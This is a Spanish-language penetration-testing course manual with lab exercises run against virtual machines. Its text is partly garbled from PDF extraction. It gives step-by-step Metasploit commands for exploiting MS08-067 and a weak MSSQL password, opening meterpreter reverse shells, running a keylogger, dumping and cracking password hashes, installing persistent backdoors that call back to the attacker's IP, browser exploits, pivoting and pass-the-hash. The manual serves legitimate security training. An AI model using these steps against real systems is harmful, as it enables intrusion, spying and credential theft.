www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

anlisis de vulnerabilidades basado en la huella de identificacin de una aplicacin. Para poder


usar netcat lanzamos el siguiente comando:

nc 192.168.137.28 80 (Colocar la direccin IP de su sistema Windows Server)

Lugo ejecutamos el siguiente comando:


comando

HEAD / HTTP/1.0

Luego damos sobre enter, y debe de salir un mensaje similar al siguiente:

En la anterior imagen se puede observar perfectamente que el servidor web del equipo
Windows 2003 Server, es IISS 6.0, software que tiene muchsimas vulnerabilidades conocidas y
cdigos de explotacin para aprovecharse de dichas vulnerabilidades.

Paso 3: Identificacin de vulnerabilidades servicios SMB: Con herramientas diversas que


pueden encontrase en la versin de Linux Backtrack, tambin pueden realizarse procesos de
anlisis de vulnerabilidades. Vamos a utilizar el software NMAP acompaado de uno de los
script que existen para este software, con el fin de identificar vulnerabilidades ara el servicio
SMB, puerto 445 TCP. Para poder usar nmap de la forma que lo necesitamos, lanzamos el
siguiente comando:

vulns.nse -p445 192.168.137.28 (Recordar cambiar la direccion IP


nmap --script smb-check-vulns.nse
de su Windows Server)

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

En la anterior imagen se puede observar los resultados del comando ejecutado, donde se
puede observar que se identifico una vulnerabilidad en el puerto 445 TCP.

Prctica de laboratorio nmero


nmer 5 "Explotacin Bsica"
Objetivos:: Aprovecharse de las vulnerabilidades encontradas en los pasos y servicios servic
anteriores, con la configuracin y ejecucin de Exploits y PAYLOADS del tipos Server Side

Recursos: VMWARE, Metasploit Framework, Windows Server 2003 y Backtrack 5

Observaciones:
Antes de proceder a realizar la prctica, verificar que las maquinas Linux Backtrack y
Windows 2003 Server estn conectados en el mismo segmento de red, y que hay ping
entre ambas maquinas.
Es altamente importante tener conocimientos bsicos-medios
bsicos medios al respecto de los
servicios de red que se estn atacando, para comprender mejor el trabajo de anlisis
de seguridad y/o penetration testing realizado.
Esta prctica tiene como objetivo principal, que el estudiando
estudiando se vaya ambientando
con la ejecucin de exploits dentro de metasploit.
La vulnerabilidad MS 08-07,
08 aun puede verse en n algunos equipos, pero en casos muy
concretos y especiales,
especiales tales como equipos XP-Server 2003 recin formateados, no
parchados,, sin el firewall activo. Esta explotacin no puede hacerse desde la WAN,
porque los routers de los ISP bloquean el trafico para puertos como el 445,139, etc. El
EXPLOIT ms08-07 07 es altamente utilizado en las academias para cursos bsicos y
avanzados dee hacking, para poder ensear todas las funcionalidades de metasploit.

Ejecucin de la prctica de laboratorio 5:


5

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Paso 1: Explotacin cin de vulnerabilidades servicios SMB: Una vez identificada las
vulnerabilidades en diversos servicios de red, procedemos a realizar la respectiva explotacin
de algunos de ellos que presentan vulnerabilidades conocidas. Para explotar la vulnerabilidad
identificada
entificada con NMAP y con NESSUS descrita como MS08-67,
MS08 67, debemos realizar lo siguiente:
(Para el siguiente ejercicio de explotacin, tener presente el siguiente esquema:

metasploit abriendo la interface msfconsole


Ingresar a metasploit,
lanzar el comando search netapi
ne
Seleccionamos el Exploit exploit/windows/smb/ms08_067_netapi,
exploit/windows/smb/ms08_067_netapi, y lo asignamos con
el comando use windows/smb/ms08_067_netapi
Luego se debe de indicar en la Shell de METASPLOIT la opcin show options,
options para
verificar lass opciones del tipo variable que se requiere en este exploit, para poder
explotar la vulnerabilidad. El resultado del comando, debe de ser similar al de la
siguiente imagen:

Por lo anterior, se debe de identificar que se necesita el puerto TCP 445 abierto (Ver
resultados NMAP Anteriores),
Anteriores), correspondiente al servicios CIFS/SMB, adems que se
necesita la direccin IP del equipo victima asignada.
Para asignar la direccin IP de la vctima , debemos de ejecutar el siguiente comando:
set RHOST Direccin IP Victima (192.168.119.225 por Ejemplo).

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Luego se debe de ingresar de nuevo el comando show options para verificar que en
efecto el valor de la direccin IP de la vctima fue asignado a la variables RHOST.
El siguiente paso es verificar cuales son los PAYLOAD que pueden usarse con este est
Exploit, para lo cual daremos el siguiente comando: show payloads
Luego se debe de elegir uno de los PAYLOAD disponibles, para el caso de este ejercicio,
y de las explicaciones presentadas en el Diplomado, vamos a elegir el siguiente
payload:
windows/meterpreter/reverse_tcp
terpreter/reverse_tcp
Para asignar este PAYLOAD a nuestro Exploit, se debe de ejecutar el siguiente
comando: set PAYLOAD windows/meterpreter/reverse_tcp
Luego la Shell (Consola de METASPLOIT), nos indica que el PAYLOAD se ha cargado.
Luego debemos de dar el e comando show options,, para ver las opciones que se
necesita asignar al PAYLOAD elegido.
El PAYLOAD elegido, necesita la variable LHOST, justo como se muestra en la siguiente
imagen (LHOST=Host Local, de donde se lanzara el Exploit, para el caso es la IP del
equipo Linux Backtrack)

Para poder asignar el valor de la IP de Backtrack a la variables LHOST, se debe de


ejecutar el siguiente comando: set LHOST Direccin IP Backtrack (Maquina Atacante)
Se vuelve a ingresar el comando show options, para ver er que en efecto la variable
LHOST quedo con la direccin IP de Backtrack Asignada.
Luego ingresamos el comando show targets,, para verificar todos los sistemas
Windows que pueden ser explotados por este Exploit.
Si hasta aqu todo va bien, no queda ms que que lanzar el ataque a la maquina victima
(Maquina Con Windows XP Y/O Server 2003 ya que ambas estan vulnerables).
vulnerables Para
lanzar el ataque, solo se debe de ingresar el siguiente comando: exploit
Luego de que el exploit, se ejecuta el PAYLOAD que hemos elegido, dejndonos en la
Shell de meterpreter de METASPLOIT. Tal y como se puede observar en la siguiente
imagen:

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Meterpreter tiene muchas opciones, pero para el caso, vamos a usar la opcin que
me permite obtener una shell en el equipo vctima, lo cual podemos lograr
ingresando el siguiente comando en la consola de meterpreter: shell

Nota: Antes de lanzar el comando shell, entrar al equipo vctima, como usuario final, y
verificar por el administrador de tareas cuantos CMD.exe hay ejecutndose, luego
hacer
cer los mismo, pero despus de lanzado el comando shell.

Luego de ejecutado el comando shell, el sistema debe de abrir la shell de


Windows XP y/o Server 2003 de la maquina victima (cmd--shell),
shell), justo como se
muestra en la siguiente imagen.

Anotacin:
otacin: si se presenta algn problema con la ejecucin de la shell, digita desde la consola
meterpreter el comando getsystem,
getsystem, para escalar privilegios en el sistema atacado.

El siguiente paso es crear algunas carpetas en la raz del disco C: del equipo
vctima, usando el comando mkdir. Luego se debe de ingresar al equipo vctima,
como si furamos un usuario normal del equipo, y verificar que en efecto se han
creado las carpetas. (Recordar crear la carpeta dentro del disco C, y no dentro de
system32, para efectos de facilidad en la visualizacin del directorio creado)

Paso 2: Explotacin de vulnerabilidades servicios MSSQL Server: En este segundo paso de


explotacin del lado server side,
side, vamos a aprovecharnos de la vulnerabilidad identificada con
la clavee dbil del usuario SA (System Administrator de SQL Server), la cual es password.
Adems que vamos a ir avanzando en los procesos de post-explotacin
post explotacin utilizando las
diferentes herramientas que nos ofrece meterpreter.

Para explotar la vulnerabilidad en mencin,


men debemos de hacer lo siguiente: (Para el siguiente
ejercicio de explotacin, tener presente el siguiente esquema)

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

realizar desde msfconsole una bsqueda con el comando search mssql


Luego en los resultados que nos aparece en pantalla, seleccionar el exploit
windows/mssql/mssql_payload
Asignar al metasploit el uso del exploit en mencin con el comando: use
windows/mssql/mssql_payload
Luego vamos a buscar los PAYLOADS disponibles para este exploit con el comando
show payloads
Seleccionamos el PAYLOAD windows/meterpreter/reverse_tcp
Luego vamos a dar el comando show options para poder ver las opciones que nos
pide el Exploit y el Payload seleccionado. Las variables a asignar son:

PASSWORD -->> aqu ponemos la clave vulnerable, la cual es password


RHOST--> aqu colocamos la IP de la victima
LHOST--> aqu colocamos la IP del atacante

Todas los valores a las anteriores variables, se asignan con el comando set

finalmente cuando todas las variables estn asignadas, se ejecuta el comando


exploit
www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Jugando con Meterpreter: Teniendo presente que meterpreter tiene muchas funcionalidades,
salimos de la consola de comandos msdos (En caso de estarlo), y desde meterpreter,
comenzamos a usar varios comandos.

Una vez desde meterpreter, lanzar los siguientes comandos:

Se debe de identificar los procesos del sistema afectado, lo cual podemos lograr
con el comando ps,
ps desde las shell de meterpreter.
Posteriormente debemos de identificar con que proceso nos pudimos colar en el
sistema victima Windows 2003 Server.
Server. Lo cual podemos identificar ejecutando el
comando: getpid, desde las shell de meterpreter. Luego ejecutamos de nuevo el
comando ps e identificamos el nombre del proceso con que ingresamos al sistema
vctima.
El siguiente paso es colocar en funcionamiento
funcionamient un Keylogger en el equipo vctima,
para poder registrar las pulsaciones del teclado.
Para lograr que el Keyloggerr funcione de manera adecuada, se debe de hacer lo
siguiente:

Abrir en el equipo server 2003 el aplicativo notepad.


Volver al equipo atacante Backtrack y ejecutar de nuevo el comando ps,
para poder identificar con que ID esta el notepad ejecutndose.
Una vez que se identifique el ID del notepad, debemos de realizar un
proceso de migracin del proceso con el cual hemos comprometido el
sistema vctima,
v al proceso que ejecuta el notepad en el mismo equipo
vctima.
Lo anterior lo logramos con la ejecucin del comando migrate,
migrate seguido del
ID identificado del proceso notepad.
Si sale algn mensaje de error por cuestiones de permisos, entonces
debemos de ejecutar el comando getsystem,, para poder escalar privilegios
en la maquina vctima.. Luego ejecutar de nuevo el comando migrate,
seguido del respectivo ID,, y ya debe de realizar una migracin exitosa.
El siguiente paso es poner el keylogger en funcionamiento,
funcionamiento, con el siguiente
comando: run keylogrecorder
Esperar unos segundos, y comenzar a escribir en el notepad de la vctima.
Luego darle control+c para detener el keylogger
Finalmente usar el comando cat desde una Shell nueva de Linux, para
visualizar las capturas de teclas, en la ruta indicada por el registro del
keylogger

Anotacin: Recordar lanzar el comando cat desde una consola (Teminal) de


comandos diferente a la de metasploit tal y como se muestra en la siguiente
imagen.

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Entre otras de las opciones


opci de meterpreter, tambin se puede registrar capturas
de pantalla de la vctima con el comando screenshot,, lo cual se puede lograr con
los siguientes pasos:

Ingresar al equipo vctima,, y abrir el notepad y colocar lo siguiente:

eta de crdito es: 12376666 y la clave es 123333


Hola, mi nmero de tarjeta

Una vez que escribamos eso, regresamos a la shell de meterprter


(resultado en pasos anteriores de esta prctica) en Backtrack y ejecutamos
el siguiente comando: screenshot
De inmediato debe de salir en Backtrack,
Backtrack, una copia de pantalla de la
vctima, con lo cual el atacante podr obtener informacin valiosa, y podr
espiar a la vctima.

Finalizando esta paso del laboratorio, vamos a obtener todos los hash de los usuarios creados
en el sistema vctima, lo cual
cua podemos hacer con el comando hashdump desde la consola
meterpreter

Luego debemos de colocar estos


estos hash en un archivo de texto para luego proceder a realizar un
proceso de crack de password. Podemos copiar y pegar los hashes en la ruta
/pentest/passwords/john.. Una vez all usamos el editor nano para guardar el archivo, y luego
procedemos a ejecutar el software crackeador
crackead de password john the ripper, lo cual podemos
po
realizar con el siguiente comando:
comando ./john hashwin

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Como se puede apreciar en la imagen,


ima el passwordss de Windows Server fue crackeado.

Anotacin: Los hash obtenidos tambin se pueden copiar y pegar en el siguiente sitio web
y all tambin pueden ser crackeados.
crackeados http://www.md5decrypter.co.uk

Sin embargo lo anterior puede ejecutarse de


de una mejor forma, y ms fcil usando
metasploit, para los cual nos vamos
vam a ayudar de dos mdulos auxiliares
es llamados:

auxiliary/analyze/jtr_crack_fast
post/windows/gather/credentials/credential_collector

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Para poder ejecutar estos dos mdulos de forma paralela,, se debe de continuar
ejecutando los siguientes pasos:
desde msfconsole seleccionar el mdulo auxiliar:
post/windows/gather/credentials/credential_collector
El anterior modulo se carga en metasploit
metaspl con el siguiente comando:
use post/windows/gather/credentials/credential_collector.
post/windows/gathe
Luego se da el comando show options y se observa que se le debe de indicar alguna de
las sesiones que se tengan activas en el moento, que para el caso deberamos de tener
dos, una sesin para la explotacin d MSSQL y otra la explotacin SMB.
indicar la sesin activa con el siguiente comando: set SESSION 1
Luego se ejecuta el modulo auxiliar con el comando run

Como se puede observar en el siguiente resultado del comando, se obtienen todos los
hash de los usuarios de Windows.
Windo

Luego se ejecuta el modulo auxiliar de metasploit auxiliary/analyze/jtr_crack_fast


/analyze/jtr_crack_fast, el
cual nos sirve para hacerle crack a todos los passwords de los usuarios del sistema
vctima, que para el caso es Windows Server.
Por ltimo ejecutamos el mdulo auxiliar con el comando run.

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Finalmente observamos que el mdulos nos obtuvo todas las contraseas (Darle
paciencia para obtener las contraseas, ya que se demora un poco)

Prctica de laboratorio nmero


nmer 6 "Mas Meterpreter"
Objetivos: Conocer y utilizar ms funcionalidades dee meterpreter a nivel de explotacin y
post- explotacion.

Recursos: VMWARE, Metasploit Framework, Windows Server 2003,


2003, Windows XP SP2 y
Backtrack 5

Observaciones:
Antes de proceder a realizar la prctica, verificar que las
las maquinas Linux Backtrack y
Windows 2003 y XP, estn conectados en el mismo segmento de red, y que hay ping
entre ambas maquinas.
Es altamente importante tener conocimientos bsicos-medios
bsicos medios al respecto de los
servicios de red que se estn atacando, para comprender
comprender mejor el trabajo de anlisis
de seguridad y/o penetration testing realizado.
Esta prctica tiene como objetivo principal, que el estudiando se vaya ambientando
con la ejecucin dee exploits dentro de metasploit, y con la consola meterpreter

Ejecucin de la prctica de laboratorio 6:


6

Paso 1: Colocar una puerta trasera con meterpreter como servicio: Teniendo presente que
meterpreter nos permite hacer muchsimas tareas de explotacin y post-explotacin
post explotacin en la
maquina vctima, vamos a proceder a dejar
dejar a meterpreter como una puerta trasera en la
maquina vctima, para que nos permita conectarnos a la victima cada que necesitemos
hacerlo, y no dependa la explotacin directamente de una vulnerabilidad conocida, ya que
esta puede ser solventada por el administrador
admi de red. Para lograr esta tarea, se debe de hacer
lo siguiente:

Estar en una consola meterpreter, la cual se lora con la explotacin de alguna


vulnerabilidad conocida en la victima.

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Ejecutar el siguiente comando para colocar meterpreter como un servicios en la


mquina victima, los cual se logra ejecutando el siguiente comando: run metsvc A
Luego debemos de ejecutar el exploit multi/handler,, lo cual se logra ejecutando el
siguiente comando: use exploit/multi/handler
Posteriormente selecciona el siguiente PAYLOAD windows/metsvc_bind_tcp
Para asignar este PAYLOAD al exploit, se ejecuta el siguiente comando: set PAYLOAD
windows/metsvc_bind_tcp
windows/metsvc_bind_tcp.
Luego se le asignan las variables al exploit, que para el caso son RHOST y el puerto en
el cual quedo a la escucha el servicio de meterpreter
Luego se ejecuta el exploit

Paso 2: Colocar una puerta trasera con meterpreter como servicio persistente:
persistente
Teniendo presente que meterpreter nos permite hacer muchsimas tareas de
explotacin y post-explotacin
explotacin en la maquina
maquina vctima, vamos a proceder a dejar un
servicios persistente que este llamando al atacante por un puerto determinado,
determ y cada
tiempo determinado, lo cual se logra realizando lo siguiente:

ejecutar el siguiente comando: run persistence -A -S -U U -i 60 -p 4321 r


192.168.56.101 (Recordar que aqu se coloca la IP de Backtrack, que ser
diferente para cada estudiante)
(Lo
Lo que hace el comando anterior, es bsicamente lo siguiente:
siguiente Con la opcin -
A se coloca una conexin a la escucha en la maquina del atacante,
atacant la opcin -S
garantiza que la puerta trasera que colocamos se inicie cada vez que la
maquina victima Windows arranque. Con la opcin -i se asigna un intervalo de
tiempo para la conexin de la victima hacia el atacante,, con la opcin -p
asignamos un puerto
puer en la maquina del atacante,, y la opcin -r indica la
direccin IP el atacante donde esta una conexin a la escucha)

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Prctica de laboratorio nmero


nmero 7 "Explotacin Bsica" del lado del cliente
Objetivos: Aprender cmo trabajan y se ejecutan los procesos
procesos de explotacin del lado del
cliente (Client Sie)

Recursos: VMWARE, Metasploit


tasploit Framework, Windows XP SP2 y Backtrack 5

Observaciones:
Antes de proceder a realizar la prctica, verificar que las maquinas Linux Backtrack y
Windows 2003 y XP, estn conectados en el mismo segmento de red, y que hay ping
entre ambas maquinas.
Es altamente importante tener conocimientos bsicos-medios
bsicos medios al respecto de los
servicios de red que se estn atacando, para comprender mejor el trabajo de anlisis
de seguridad y/o penetration testing realizado.
Esta prctica tiene como objetivo principal, que el estudiando se vaya ambientando
con la ejecucin de exploits dentro de metasploit, y con la consola meterpreter

Ejecucin de la prctica de laboratorio 7:


7

tacin de Internet Explorer (Aurora): Comenzando con los procesos de


Paso 1: Explotacin
explotacin del lado del cliente, vamos a usar un exploit que se aprovecha de una
vulnerabilidad conocida
da en Internet explorer, conocida como operacion aurora.
aurora Para ejecutar
este exploit, debemos de realiza lo siguiente:

Seleccionar el exploit exploit/windows/browser/ms10_002_aurora


Asignarlo a la consola con el comando: use
exploit/windows/browser/ms10_002_aurora
seleccionar un PAYLOAD, para el caso vamos a usar set payload
windows/meterpreter/reverse_tcp
erpreter/reverse_tcp
set URIPATH /
set LHOST 192.168.33.129
set LPORT 443
exploit

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

autopwn Continuando
Paso 2: Explotacin de navegadores con el modulo Browser autopwn: ntinuando con los
procesos
rocesos de explotacin del lado,
lado, ahora vamos a configurar el exploit llamado use
liary/server/browser_autopwn, el cual se aprovecha de vulnerabilidades conocidas de
auxiliary/server/browser_autopwn
varios navegadores. Para ejecutar este exploit, debemos de realiza lo siguiente:

Seleccionar el exploit auxiliary/server/browser_autopwn


Asignar este exploit con el comando
coman use Para asignar este exploit, debemos de
ejecutar el siguiente comando: use exploit auxiliary/server/browser_autopwn
Luego se debe de asignar la variable LHOST y la variable URIPATH.
Finalmente se le da el comando exploit, y se le enva a la victima la URL del servidor
web que acaba de cargar metasploit.

Anotacin: hay que darle un poco de paciencia a la ejecucin de este exploit ya que lanza
varios cdigos de explotacin y al final nos muestra las sesiones que logro abrir en la mquina
vctima.

Prctica de laboratorio nmero


nmer 8 "Pivoting"
Objetivos: Aprender cmo se realiza el proceso
proceso de pivoting entre dos subrede

Recursos: VMWARE, Metasploit


tasploit Framework, Windows ServerWindows
Windows XP SP2 y Backtrack 5

Observaciones:

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Antes de proceder a realizar la prctica, verificar que las maquinas Linux Backtrack y
Windows 2003 y XP, estn conectados en el mismo segmento de red, y que hay ping
entre ambas maquinas.
Esta prctica debe de hacerse desde dos maquinas fsicas, 4 maquinas virtuales

Anotacin general
al de la prctica 8:

Para la siguiente practica, se debe de tener presente el siguiente escenario:

Nota: Tener presente que en el esquema anterior los puntos rojos representan dos tarjetas de
red en el servidor Windows 2003, cada una de ellas debe de esta configurada con diferentes
subredes (Segmentos de red). La que est conectada al segmento de red que est en bridge,
esta suministrada directamente por el servidor DHCP de la maquina local. Y la otra tarjeta
podemos asignarle una direccin IP como la 10.0.0.1 mascara 255.255.255.0. Tener presente
primero prender el Windows server y renombrar la tarjeta de red actual como WAN, y la otra
que se va a crear, se renombra como LAN.
LAN

Es altamente importante ensayar que el si se presente ping entre los diferentes


diferen segmentos
de red antes de comenzar la prctica.

Pasos para ejecutar la prctica:

Los pasos que se deben de realizar paso para poder lograr el proceso de pivoting en la
maquina victima (Windows XP Victima final) es el siguiente:

1) Lo primero es configurar
igurar las tarjetas de red para el laboratorio, las cuales se configuran de la
siguiente manera:

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Windows Server: debe de tener dos tarjetas de red una conectada en modo bridge, y la
segunda la vamos a conectar en modo VMNET2. Justo como se puede apreciar en la siguiente
imagen.

Recordar que la que est en bridge, obtiene DHCP por medio de la red LAN, y la que est en
VMNET2 se le configura manualmente una 10.0.0.1/24.

Luego se configura la maquina Windows XP y la tarjeta de red tambin la colocamos como co


VMNET2, y asignamos otra Direccin IP del mismo rango que en Windows server, la cual
puede ser 10.0.0.11/24. Tener presente colocarle en la configuracin de la tarjeta de red de
Windows XP como servidor DNS y puerta de enlace la direccin IP de Windows Server.

2) Una vez configuradas las tarjetas de red, el siguiente paso es integrar a Windows XP al
dominio que se encuentra en Windows Server 2003.

3) El tercer paso es vulnerar a Windows Server por su tarjeta de red configurada en modo
Bridge. Lo anterioror se hace desde Linux BT5. Recordar que BT5 debe de estar configurado
tambin en modo Bridge, y por el segmento de red de Windows Server. Se recomienda usar un
exploit al cual sea vulnerable, y en el PAYLOAD usar Windows Meterpreter Reverse TCP.

4) El cuarto
uarto paso es averiguar cuantas tarjetas de red tiene el equipo vctima, y la configuracin
de estas. Si todo va hasta aqu bien, se deben de identificar 2 tarjetas de red.
red

Adicionalmente desde meterpreter se puede lanzar el comando run arp_scanner r


10.0.0.0/24.

Con el anterior comando se puede identificar otros host conectados al segmento de red
alterno del servidor 2003.

5) Salir de meterpreter con el comando background para proceder a agregar una ruta a
nuestra maquina, lo cual hacemos con el siguiente
siguie comando:

route add 10.0.0.0 255.255.255.0 1 (ojo el ultimo 1 pertenece a la sesin que se abri con
Meterpreter)

Luego damos el comando route print para ver la ruta.

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Si se presentan problemas con adicionar la ruta, se puede optar por los siguientes comandos:

run autorun h y luego


run autoroute ss 10.0.0.0/24

O tambin puede usarse el modulo auxiliar llamado post/windows/manage/autoroute.


post/windows/manage/autoroute
Este nos va a solicitar la sesin abierta y la subred a la cual queremos enrutarnos

6) Una vez que se tiene laa ruta, el siguiente paso es sacar los Hash de los usuarios del dominio
llamado METASPLOIT. Lo o anterior ya se vio en prcticas de laboratorio pasadas.

7) El siguiente paso es buscar host activos en la red, para lo cua podemos hacer uso del
modulo auxiliar de Metasploit llamado:
llamado auxiliary/scanner/portscan/tcp.. Este mdulo nos pide
los puertos, que para el caso vamos a darle 80,135,139,445, y nos pide la vctima,
vctima que para el
caso solo vamos a comenzar el Scanning desde la IP 10.0.0.1 hasta la 10.0.0.15. Luego le
damos run, y si todo va bien, debemos de ver la IP 10.0.0.11, perteneciente a Windows XP, con
todos sus respectivos puertos abiertos.

Lanzar exploit:

8) Se puede proceder a lanzar de nuevo el exploit NETAPI, pero esta vez se realiza contra el
equipo Windows XP, pero esta vez se debe de ejecutar el PAYLOAD meterpreter/bind_tcp

Optativo: Lanzar otro exploit:

9) Tambin podemos lanzar otro ataque al protocolo SMB, lo cual podemos realizar con el
PAYLOAD llamado: exploit/windows/smb/psexec.
exploit/windows/smb/psexec Cuando seleccionemos
ccionemos este PAYLOAD, se le
deben de asignar las siguientes variables (Tener presente que para este exploit se requiere de
los hash que obtuvieron en pasos anteriores de esta prctica).

RHOST: 10.0.0.11
SMBUser administrator
SMBPass se le coloca el hash obtenido en puntos anteriores de esta prctica (Ojo copiar y
Pegar el HASH, en lo que respecta al contenido que esta antes de :::)
SMBDomain (Colocar el nombre del dominio, el cual debe de ser METASPLOIT)
Y por ltimo el PAYLOAD, el cual es Meterpreter/bind_tcp.
Meterpreter/bi
Finalmente se ejecuta con el comando run

www.dsteamseguridad.com

Vous aimerez peut-être aussi